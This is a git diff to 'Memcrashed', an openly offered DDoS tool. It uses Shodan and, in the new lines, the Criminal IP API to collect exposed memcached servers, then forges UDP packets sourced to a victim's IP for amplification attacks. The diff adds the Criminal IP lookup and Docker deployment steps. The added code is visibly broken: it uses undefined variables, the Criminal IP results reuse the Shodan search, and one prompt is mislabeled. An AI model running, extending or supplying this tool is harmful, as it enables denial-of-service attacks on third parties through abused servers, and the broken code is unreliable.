diff --git a/Memcrashed.py b/Memcrashed.py index bf89a6e..05640c1 100644 --- a/Memcrashed.py +++ b/Memcrashed.py @@ -1,6 +1,6 @@ #-- coding: utf8 -- #!/usr/bin/env python3 -import sys, os, time, shodan +import sys, os, time, shodan, requests from pathlib import Path from scapy.all import * from contextlib import contextmanager, redirect_stdout @@ -27,51 +27,86 @@ class color: ╚═╝ ╚═╝╚══════╝╚═╝ ╚═╝ ╚═════╝╚═╝ ╚═╝╚═╝ ╚═╝╚══════╝╚═╝ ╚═╝╚══════╝╚═════╝ Author: @037 + Support: @Parkjunmin Version: 4.0 -####################################### DISCLAIMER ######################################## -| Memcrashed is a tool that allows you to use Shodan.io to obtain hundreds of vulnerable | -| memcached servers. It then allows you to use the same servers to launch widespread | -| distributed denial of service attacks by forging UDP packets sourced to your victim. | -| Default payload includes the memcached "stats" command, 10 bytes to send, but the reply | -| is between 1,500 bytes up to hundreds of kilobytes. Please use this tool responsibly. | -| I am NOT responsible for any damages caused or any crimes committed by using this tool. | -########################################################################################### +####################################### DISCLAIMER ####################################################### +| Memcrashed is a tool that allows you to use Criminalip.io, Shodan.io to obtain hundreds of vulnerable | +| memcached servers. It then allows you to use the same servers to launch widespread | +| distributed denial of service attacks by forging UDP packets sourced to your victim. | +| Default payload includes the memcached "stats" command, 10 bytes to send, but the reply | +| is between 1,500 bytes up to hundreds of kilobytes. Please use this tool responsibly. | +| I am NOT responsible for any damages caused or any crimes committed by using this tool. | +########################################################################################################## ''' print(logo) if keys.is_file(): - with open('api.txt', 'r') as file: + with open('Shodan_api.txt', 'r') as file: SHODAN_API_KEY=file.readline().rstrip('\n') else: - file = open('api.txt', 'w') + file = open('Shodan_api.txt', 'w') SHODAN_API_KEY = input('[*] Please enter a valid Shodan.io API Key: ') file.write(SHODAN_API_KEY) - print('[~] File written: ./api.txt') + print('[~] File written: ./shodan_api.txt') file.close() +if keys.is_file(): + with open('Criminalip_api.txt', 'r') as file: + Criminalip_API_KEY=file.readline().rstrip('\n') +else: + file = open('Criminalip_api.txt', 'w') + Criminalip_API_KEY = input('[*] Please enter a valid Criminalip.io API Key: ') + file.write(Criminalip_API_KEY) + print('[~] File written: ./Criminalip_api.txt') + file.close() + while True: - api = shodan.Shodan(SHODAN_API_KEY) + shodan_api = shodan.Shodan(SHODAN_API_KEY) print('') - try: + try: # Criminalip_API_KEY myresults = Path("./bots.txt") - query = input("[*] Use Shodan API to search for affected Memcached servers? : ").lower() - if query.startswith('y'): + shodan_query = input("[*] Use Shodan API to search for affected Memcached servers? : ").lower() + if shodan_query.startswith('y'): print('') print('[~] Checking Shodan.io API Key: %s' % SHODAN_API_KEY) - results = api.search('product:"Memcached" port:11211') + shodan_results = shodan_api.search('product:"Memcached" port:11211') + criminalip_results = shodan_api.search('product:"Memcached" port:11211') print('[✓] API Key Authentication: SUCCESS') - print('[~] Number of bots: %s' % results['total']) + print('[~] Number of bots: %s' % shodan_results['total']) print('') saveresult = input("[*] Save results for later usage? : ").lower() + if saveresult.startswith('y'): file2 = open('bots.txt', 'a') - for result in results['matches']: + for result in shodan_results['matches']: file2.write(result['ip_str'] + "\n") print('[~] File written: ./bots.txt') print('') file2.close() + + criminalip_query = input("[*] Use Shodan API to search for affected Memcached servers? : ").lower() + if criminalip_query.startswith('y'): + print('') + print('[~] Checking Criminalip.io API Key: %s' % Criminalip_API_KEY) + criminalip_results = "https://api.criminalip.io/v1/banner/search?query=" + data = {"query":'product:"Memcached" port:11211'} + result_cip = json.loads(requests.request("GET", url, headers=headers, data=data).text)['data']['result'] + + + print('[✓] API Key Authentication: SUCCESS') + print('[~] Number of bots: %s' % len(result_cip)) + print('') + saveresult = input("[*] Save results for later usage? : ").lower() + + if saveresult.startswith('y'): + file2 = open('bots.txt', 'a') + for i in range(len(result_cip)): + file2.write(result_cip[i]['ip_address']) + print('[~] File written: ./bots.txt') + print('') + file2.close() saveme = input('[*] Would you like to use locally stored Shodan data? : ').lower() if myresults.is_file(): if saveme.startswith('y'): @@ -81,7 +116,7 @@ class color: print('') print('[✘] Error: No bots stored locally, bots.txt file not found!') print('') - if saveme.startswith('y') or query.startswith('y'): + if saveme.startswith('y') or shodan_query.startswith('y'): print('') target = input("[▸] Enter target IP address: ") targetport = input("[▸] Enter target port number (Default 80): ") or "80" @@ -94,7 +129,7 @@ class color: getdata = ("\x00\x00\x00\x00\x00\x00\x00\x00get\x00injected\r\n") print("[+] Payload transformed: ", dataset) print('') - if query.startswith('y'): + if shodan_query.startswith('y'): iplist = input('[*] Would you like to display all the bots from Shodan? : ').lower() if iplist.startswith('y'): print('') diff --git a/README.md b/README.md index 5afb93e..6a32068 100644 --- a/README.md +++ b/README.md @@ -2,7 +2,7 @@ * Author: [@037](https://twitter.com/037) -This tool allows you to send forged UDP packets to Memcached servers obtained from Shodan.io +This tool allows you to send forged UDP packets to Memcached servers obtained from Criminalip.io, Shodan.io ### Prerequisites @@ -13,6 +13,7 @@ apt-get install python3 ``` You also require to have Scapy and Shodan modules installed +Criminalip shares this method because the Python library does not currently exist and it can be called directly from the API. ``` pip install scapy ``` @@ -25,7 +26,7 @@ pip install shodan This tool requires you to own an upgraded Shodan API -You may obtain one for free in [Shodan](https://shodan.io/) if you sign up using a .edu email +You may obtain one for free in [Criminalip](https://www.criminalip.io/), [Shodan](https://shodan.io/) if you sign up using a .edu email ![alt text](https://raw.githubusercontent.com/649/Memcrashed-DDoS-Exploit/master/2.png) ![alt text](https://raw.githubusercontent.com/649/Memcrashed-DDoS-Exploit/master/1.png) @@ -44,7 +45,8 @@ You may deploy this tool to the cloud using a light Alpine Docker image. ```bash git clone https://github.com/649/Memcrashed-DDoS-Exploit.git cd Memcrashed-DDoS-Exploit -echo "SHODAN_KEY" > api.txt +echo "SHODAN_KEY" > Shodan_api.txt +echo "Criminalip_KEY" > Criminalip_api.txt docker build -t memcrashed . docker run -it memcrashed